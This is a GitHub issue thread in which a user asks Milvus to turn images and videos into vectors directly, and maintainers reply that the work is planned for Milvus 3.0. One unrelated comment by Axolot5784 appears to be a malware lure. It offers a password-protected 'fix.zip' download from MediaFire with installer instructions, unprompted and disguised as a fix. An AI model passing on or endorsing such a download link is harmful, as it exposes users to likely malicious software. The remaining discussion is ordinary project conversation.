### ISSUE TITLE
[Feature]: Milvus should support the direct conversion of resources such as images and videos into vectors; This feature will reduce the cost of using Milvus, and the user base will experience explosive growth

### ISSUE THREAD

**Issue by tulingfufu** [milvus-io/milvus#35797]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Is your feature request related to a problem? Please describe.

When I use it, I need to convert my resources into vectors, but I don't think I need this process because vector databases should support this functionality

### Describe the solution you'd like.

Milvus should support the direct conversion of resources such as images and videos into vectors; This feature will reduce the cost of using Milvus, and the user base will experience explosive growth

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaofan-luan** [comment]
I are already on it.
This is the overall goal for Milvus 3.0

**Comment by tulingfufu** [comment]
I am very much looking forward to and hoping to have the opportunity to participate in such a great project.

**Comment by tulingfufu** [comment]
When is it expected to be released?



发自我的iPhone


------------------ Original ------------------
From: Xiaofan ***@***.***&gt;
Date: Thu,Aug 29,2024 1:07 PM
To: milvus-io/milvus ***@***.***&gt;
Cc: tulingfufu ***@***.***&gt;, Author ***@***.***&gt;
Subject: Re: [milvus-io/milvus] [Feature]: Milvus should support the directconversion of resources such as images and videos into vectors; This featurewill reduce the cost of using Milvus, and the user base will experienceexplosive growth (Issue #35797)





 
I are already on it.
 This is the overall goal for Milvus 3.0

**Comment by xiaofan-luan** [comment]
@liliu-z's team is working it.
you may want to talk to him.
The target release is next year but we may do beta by the end of this year.

**Comment by tulingfufu** [comment]
I really hope to join. If I can't join, I hope to experience it first. I come from China and am good at Java but not good at Python.

**Comment by liliu-z** [comment]
@junjiejiangjjj Plz create a issue here to track the development progress

**Comment by tulingfufu** [comment]
i am in beijing,Can I add you on WeChat.

**Comment by tulingfufu** [comment]
I really hope to have detailed communication with you，can i get you wechat? my wechat id is shoujiangfu.I hope to add you
